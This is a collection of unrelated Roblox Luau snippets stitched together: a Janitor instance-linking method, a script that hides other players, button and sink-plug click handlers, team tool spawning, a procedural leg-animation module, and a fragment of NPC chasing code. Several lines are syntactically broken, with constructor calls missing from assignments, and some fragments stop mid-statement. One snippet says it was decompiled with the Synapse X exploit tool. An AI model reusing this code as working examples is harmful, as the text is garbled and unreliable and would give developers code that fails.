-- If you would like to add more spawn locations, add more if statements -- EXACTLY the same way as the other 4 plus, add to the top of -- this script the same thing as the stated parts with their CFrames.
-- Get services
local players = game:GetService("Players") local replicatedStorage = game:GetService("ReplicatedStorage")
--[[** "Links" this Janitor to an Instance, such that the Janitor will `Cleanup` when the Instance is `Destroyed()` and garbage collected. A Janitor may only be linked to one instance at a time, unless `AllowMultiple` is true. When called with a truthy `AllowMultiple` parameter, the Janitor will "link" the Instance without overwriting any previous links, and will also not be overwritable. When called with a falsy `AllowMultiple` parameter, the Janitor will overwrite the previous link which was also called with a falsy `AllowMultiple` parameter, if applicable. @param [t:Instance] Object The instance you want to link the Janitor to. @param [t:boolean?] AllowMultiple Whether or not to allow multiple links on the same Janitor. @returns [t:RbxScriptConnection] A pseudo RBXScriptConnection that can be disconnected to prevent the cleanup of LinkToInstance. **--]]
function Janitor.__index:LinkToInstance(Object, AllowMultiple) local Connection local IndexToUse = AllowMultiple and newproxy(false) or LinkToInstanceIndex local IsNilParented = Object.Parent == nil local ManualDisconnect = setmetatable({}, Disconnect) local function ChangedFunction(_DoNotUse, NewParent) if ManualDisconnect.Connected then _DoNotUse = nil IsNilParented = NewParent == nil if IsNilParented then task.defer(function() if not ManualDisconnect.Connected then return elseif not Connection.Connected then self:Cleanup() else while IsNilParented and Connection.Connected and ManualDisconnect.Connected do task.wait() end if ManualDisconnect.Connected and IsNilParented then self:Cleanup() end end end) end end end Connection = Object.AncestryChanged:Connect(ChangedFunction) ManualDisconnect.Connection = Connection if IsNilParented then ChangedFunction(nil, Object.Parent) end Object = nil return self:Add(ManualDisconnect, "Disconnect", IndexToUse) end
-- Decompiled with the Synapse X Luau decompiler.
local u1 = false; local l__LocalPlayer__2 = game.Players.LocalPlayer; local u3 = {}; script.Parent.MouseButton1Click:Connect(function() if not u1 then u1 = true; script.Parent.Text = "Show other players"; local v1 = game.Players:GetChildren(); for v2 = 1, #v1 do if v1[v2].Name ~= l__LocalPlayer__2.Name then table.insert(u3, workspace[v1[v2].Name]); end; end; for v3 = 1, #u3 do u3[v3].Parent = nil; end; elseif u1 then u1 = false; script.Parent.Text = "Hide other players"; for v4 = 1, #u3 do u3[v4].Parent = workspace; end; u3 = {}; end; print(unpack(u3)); end);
-- so long, ___ bowser!
local deb = false local TS = game:GetService("TweenService") for i,v in pairs(script.Parent:GetChildren()) do if v.Name == "Button" then local CD ="ClickDetector",v) CD.MaxActivationDistance = 5 CD.MouseClick:Connect(function() if not deb then deb = true local anim = TS:Create(v,,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut,0,true,0),{CFrame = v.CFrame *,0,0)}) anim.Completed:Connect(function() deb = false end) anim:Play() end end) end end
----- sink plug handler -----
plug.Interactive.ClickDetector.MouseClick:Connect(function() if plugged.Value == false then plugged.Value = true plug.Plug.CFrame = plug.Plug.CFrame *,-0.1,0) else plugged.Value = false plug.Plug.CFrame = plug.Plug.CFrame *,0.1,0) end end)
--Instructions: Put the tools in the Team
script.Parent = game.ServerScriptService game.Players.PlayerAdded:connect(function(plr) plr.CharacterAdded:connect(function(char) for _,v in pairs(game:GetService("Teams"):GetChildren()) do if v.TeamColor == plr.TeamColor then for _,v in pairs(v:GetChildren()) do if v:IsA("Tool") then v:Clone().Parent = plr:WaitForChild("Backpack") end end end end end) end)
--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//-- --//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//-- --//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//-- --//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//-- --//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--//--
module.getQueueFunction = function(character) -- Get all the base parts and values needed to further calculate everything local humanoid =character:WaitForChild("Humanoid") local rootpart =character:WaitForChild("HumanoidRootPart") local uppertorso =character:WaitForChild("UpperTorso") local lowertorso =character:WaitForChild("LowerTorso") local waistjoint =uppertorso:WaitForChild("Waist") local rootjoint =lowertorso:WaitForChild("Root") local root0 =rootjoint.C0 local root1 =rootjoint.C1 local waist1 =waistjoint.C1 local rightupperleg =character:WaitForChild("RightUpperLeg") local rightlowerleg =character:WaitForChild("RightLowerLeg") local leftupperleg =character:WaitForChild("LeftUpperLeg") local leftlowerleg =character:WaitForChild("LeftLowerLeg") local righthip =rightupperleg:WaitForChild("RightHip") local rightknee =rightlowerleg:WaitForChild("RightKnee") local lefthip =leftupperleg:WaitForChild("LeftHip") local leftknee =leftlowerleg:WaitForChild("LeftKnee") local righthip0 =righthip.C0 local rightknee0 =rightknee.C0 local lefthip0 =lefthip.C0 local leftknee0 =leftknee.C0 -- local direction = V3(1,0,1) -- This will be changed local stride = 2.3 -- Changes how far the legs move local cycleSpeed = 14 -- How fast the leg-movement cycle is. Change this to suit your needs! local left,right = 0,math.pi -- Initial rotations local strideCF = CF(0,0,-stride/2) -- Turn that stride number into a CFrame we can use local raycastParams = -- Used for raycasting raycastParams.FilterDescendantsInstances = {character} raycastParams.IgnoreWater = true raycastParams.FilterType = Enum.RaycastFilterType.Blacklist -- return function(dt) -- dt, or delta, is the amount of time passed between render frames. 1/dt = frames per second local dt10 =math.min(dt*10,1) -- Normalize dt for our needs local lowercf =lowertorso.CFrame -- Our position local rootcf =rootpart.CFrame -- Another position local rootvel0 =rootpart.Velocity -- Our movement velocity local rootvel,rootvelm local climbing =humanoid:GetState()==Enum.HumanoidStateType.Climbing -- Are we climbing? --==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==-- --==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==-- if climbing then -- Don't animate if we are climbing, it looks weird rootvel =rootvel0 rootvelm =rootvel.Magnitude direction =rootcf.lookVector else rootvel =rootvel0*x_and_y rootvelm =rootvel.Magnitude if rootvelm>0.1 then direction =direction:Lerp(rootvel.unit, dt10) end end --==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==-- --==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==-- local up =rootvelm/16 local cycle =up*dt*cycleSpeed right =(right+cycle)%tau left =(left+cycle)%tau --==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==-- --==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==-- if rootvelm>0.1 then --// When moving -- Relative Velocity local relv0 =lowercf:vectorToObjectSpace(rootvel) local relv1 =relv0*0.2 local relvx =relv0.X/rootvel.Magnitude do -- Upper Torso waistjoint.C1 =waistjoint.C1:Lerp(waist1*ANGLES(math.rad(relv1.Z),0.1*math.cos(right)-2*math.rad(relv1.X),math.rad(-relv1.X)):inverse(),dt10) end do -- Right Leg local hip =(rootcf*rhipcf).p local ground =(rootcf*rhipcf2).p local desiredPos =(CF(ground, ground+direction)*ANGLES(-right, 0, 0)*strideCF).p local offset =(desiredPos-hip) local raycastResult = workspace:Raycast(hip,offset.unit*(offset.magnitude+0.5),raycastParams) local footPos = raycastResult and raycastResult.Position or (hip + offset.unit*(offset.magnitude+0.5)) local plane,th1,th2 =solveLegIK(lowercf*righthip0,footPos, 0.55,1.15) -- 0.55,1.15 righthip.C0 =righthip.C0:Lerp(lowercf:toObjectSpace(plane)*ANGLES(th1,0,0),0.25) rightknee.C0 =rightknee.C0:Lerp(rightknee0*ANGLES(th2,0,0),0.25) end do-- Left Leg local hip =(rootcf*lhipcf).p local ground =(rootcf*lhipcf2).p local desiredPos =(CF(ground, ground+direction)*ANGLES(-left, 0, 0)*strideCF).p local offset =(desiredPos-hip) local raycastResult = workspace:Raycast(hip,offset.unit*(offset.magnitude+0.5),raycastParams) local footPos = raycastResult and raycastResult.Position or (hip + offset.unit*(offset.magnitude+0.5)) local plane,th1,th2 =solveLegIK(lowercf*lefthip0,footPos, 0.55,1.15) lefthip.C0 =lefthip.C0:Lerp(lowercf:toObjectSpace(plane)*ANGLES(th1,0,0),0.25) leftknee.C0 =leftknee.C0:Lerp(leftknee0*ANGLES(th2,0,0),0.25) end --|||||||||||-- --|||||||||||-- else --// When not moving -- Upper Torso waistjoint.C1 =waistjoint.C1:Lerp(waist1, dt10) do -- Right Leg local hipcf =(rootcf*rhipcf) local hip =hipcf.p local desiredPos =(hipcf*rIdle).p local offset =(desiredPos-hip) local raycastResult = workspace:Raycast(hip,offset.unit*(offset.magnitude+0.5),raycastParams) local footPos = raycastResult and raycastResult.Position or (hip + offset.unit*(offset.magnitude+0.5)) local plane,th1,th2 =solveLegIK(lowercf*righthip0,footPos, 0.55,1.15) righthip.C0 =righthip.C0:Lerp(lowercf:toObjectSpace(plane)*ANGLES(th1,0,0),0.25) rightknee.C0 =rightknee.C0:Lerp(rightknee0*ANGLES(th2,0,0),0.25) end do -- Left Leg local hipcf =(rootcf*lhipcf) local hip =hipcf.p local desiredPos =(hipcf*lIdle).p local offset =(desiredPos-hip) local raycastResult = workspace:Raycast(hip,offset.unit*(offset.magnitude+0.5),raycastParams) local footPos = raycastResult and raycastResult.Position or (hip + offset.unit*(offset.magnitude+0.5)) local plane,th1,th2 =solveLegIK(lowercf*lefthip0,footPos, 0.55,1.15) lefthip.C0 =lefthip.C0:Lerp(lowercf:toObjectSpace(plane)*ANGLES(th1,0,0),0.25) leftknee.C0 =leftknee.C0:Lerp(leftknee0*ANGLES(th2,0,0),0.25) end --|||||||||||-- --|||||||||||-- end end -- end return module
-- Bind tool events
Tool.Equipped:connect(equip) Tool.Unequipped:connect(unequip) Tool.Activated:connect(OnActivated)
hum.MoveToFinished:connect(function() anims.AntWalk:Stop() if enRoute then enRoute = false end end) local movementCoroutine = coroutine.wrap(function() while true do if target then local sessionLock = lastLock if targetType == "Player" then while target and lastLock == sessionLock do if target.Character and target.Character:IsDescendantOf(workspace) and target.Character.Humanoid and target.Character.Humanoid.Health > 0 then local dist = (root.Position-target.Character.PrimaryPart.Position).magnitude if dist < 10 then
-- Slider sizes (Fast)
local fastSize =, 0, 1, 0)